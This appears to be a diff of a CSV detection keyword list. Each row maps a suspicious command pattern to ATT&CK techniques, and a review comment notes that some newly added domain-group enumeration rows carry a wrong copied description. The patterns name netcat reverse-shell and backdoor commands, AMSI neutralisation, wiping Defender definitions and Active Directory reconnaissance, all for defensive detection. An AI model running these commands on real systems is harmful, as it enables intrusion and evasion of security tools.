 "*lochiccbgeohimldjooaakjllnafhaid*","greyware_tool_keyword","IP Unblock","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*macchanger -r *","greyware_tool_keyword","macchanger","changing mac address with macchanger","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A"
 "*macdlemfnignjhclfcfichcdhiomgjjb*","greyware_tool_keyword","Free Fast VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
-"*MacOS/ipscan -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*MacOS/ipscan -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
 "*majdfhpaihoncoakbjgbdhglocklcgno*","greyware_tool_keyword","Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*MATCH (c:Computer {unconsraineddelegation:true}) RETURN c*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers in Unconstrained Delegations","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*MATCH (c:Computer)*(t:Computer)* *-[:AllowedToDelegate]* return p*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -711,9 +711,9 @@ "*mhngpdlhojliikfknhfaglpnddniijfh*","greyware_tool_keyword","WorkingVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*mjnbclmflcpookeapghfhapeffmpodij*","greyware_tool_keyword","Ultrareach VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*mjolnodfokkkaichkcjipfgblbfgojpa*","greyware_tool_keyword","DotVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*modprobe -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*modprobe --remove*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*modprobe rmmod -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*modprobe -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*modprobe --remove*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*modprobe rmmod -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*movefile64.exe /nobanner *.dll C:\Windows\System32\amsi.dll*","greyware_tool_keyword","movefile64.exe","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*mpcaainmfjjigeicjnlkdfajbioopjko*","greyware_tool_keyword","VPN Unlimited Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*MpCmdRun.exe -RemoveDefinitions -All*","greyware_tool_keyword","MpCmdRun","Wipe currently stored definitions","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" 
@@ -728,20 +728,30 @@ "*nbtscan -r */24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*nbtscan -r */24*","greyware_tool_keyword","nbtscan","smb enumeration","T1135 - T1046","TA0007 - TA0009","N/A","N/A","discovery","https://github.com/charlesroelli/nbtscan","1","0","N/A","5","2","124","23","2016-05-26T20:16:52Z","2016-05-26T20:16:33Z" "*nbtstat -n*","greyware_tool_keyword","nbtstat","Displays the NetBIOS name table of the local computer. The status of registered indicates that the name is registered either by broadcast or with a WINS server.","T1049 - T1018 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat","1","0","N/A","4","10","N/A","N/A","N/A","N/A" -"*nc * -e /bin/bash*","greyware_tool_keyword","netcat","netcat shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*nc * -e /bin/bash*","greyware_tool_keyword","netcat","netcat shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*nc -l -p * -e *.bat*","greyware_tool_keyword","nc","Netcat Realy on windows - create a 
relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*nc -l -p * -e /bin/bash*","greyware_tool_keyword","nc","Netcat Backdoor on Linux - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*nc -l -p * -e cmd.exe*","greyware_tool_keyword","nc","Netcat Backdoor on Windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*nc -u -lvp *","greyware_tool_keyword","netcat","netcat shell listener","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*nc -u -lvp *","greyware_tool_keyword","netcat","netcat shell listener","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False 
positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*nc -v -n -z -w1 *-*","greyware_tool_keyword","nc","Port scanner with netcat","T1046","TA0007","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*nc -z -v * *","greyware_tool_keyword","nc","netcat common arguments","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ncat * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*ncat * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*ncat * -p 4444*","greyware_tool_keyword","ncat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*ncat --udp * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - 
TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" -"*neo4j console*","greyware_tool_keyword","bloodhound","he neo4j console command is used to start the Neo4j server in console mode. While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","greyware tool - risks of False positive !","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*ncat --udp * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*neo4j console*","greyware_tool_keyword","bloodhound","he neo4j console command is used to start the Neo4j server in console mode. 
While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","greyware tool - risks of False positive !","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*neo4j start*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*net group ""Domain Admins"" /domain*","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - 
TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Domain Controllers*/domain*","greyware_tool_keyword","net","Query Domain Comtrollers Computers in the current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group /domain *Domain Admins*","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - 
TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*net group administrators /domain*","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" "*net localgroup admin*","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","N/A","Discovery","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" 
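Review bot: The ten added `*net group *<group>* /domain*` rows (Account Operators through Server Operators) carry the description "display all domain names on the network" and the mapping `"T1016 - T1046","TA0007 - TA0009"`, which look copied from the `*net view /all /domain*` row. These keywords match enumeration of privileged domain group membership, so an analyst triaging a hit is given the wrong context. I would reuse the mapping of the neighbouring `*net group ""Domain Admins"" /domain*` row, for example `"enumerate members of a privileged domain group","T1069.002 - T1087.002","TA0007"`, and give the rows a severity score instead of `N/A`, since that neighbouring row scores 10. If the keywords are matched as globs, the new `*net group *Domain Controllers* /domain*` also appears to be a subset of the existing `*net group *Domain Controllers*/domain*`, so one command line would hit both rows with conflicting metadata. The same description and mapping are repeated on the `net.exe`, `net1` and `net1.exe` rows added in the `@@ -750,7 +760,37 @@` hunk.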
@@ -750,7 +760,37 @@ "*net rpc group members 'Domain Users' -W *","greyware_tool_keyword","samba","The net command is one of the new features of Samba-3 and is an attempt to provide a useful tool for the majority of remote management operations necessary for common tasks. It is used by attackers to find users list","T1087.002 - T1003.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*net view /all /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net* group Administrator* /add /domain*","greyware_tool_keyword","net","adding a user to a privileged group. This action can be used by adversaries to maintain unauthorized access or escalate privileges within the targeted environment.","T1098","TA0003","N/A","N/A","Persistence","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*net.exe* group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - 
TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Domain Computers* 
/domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net1 localgroup admin*","greyware_tool_keyword","net","showing users in a privileged group. 
","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - 
TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*netCat*","greyware_tool_keyword","netcat","Netcat is a featured networking utility which reads and writes data across network connections","T1043 - T1052 - T1071 - T1095 - T1132 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","http://netcat.sourceforge.net/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netdiscover -i * -r */24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*netscan.exe /*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" 
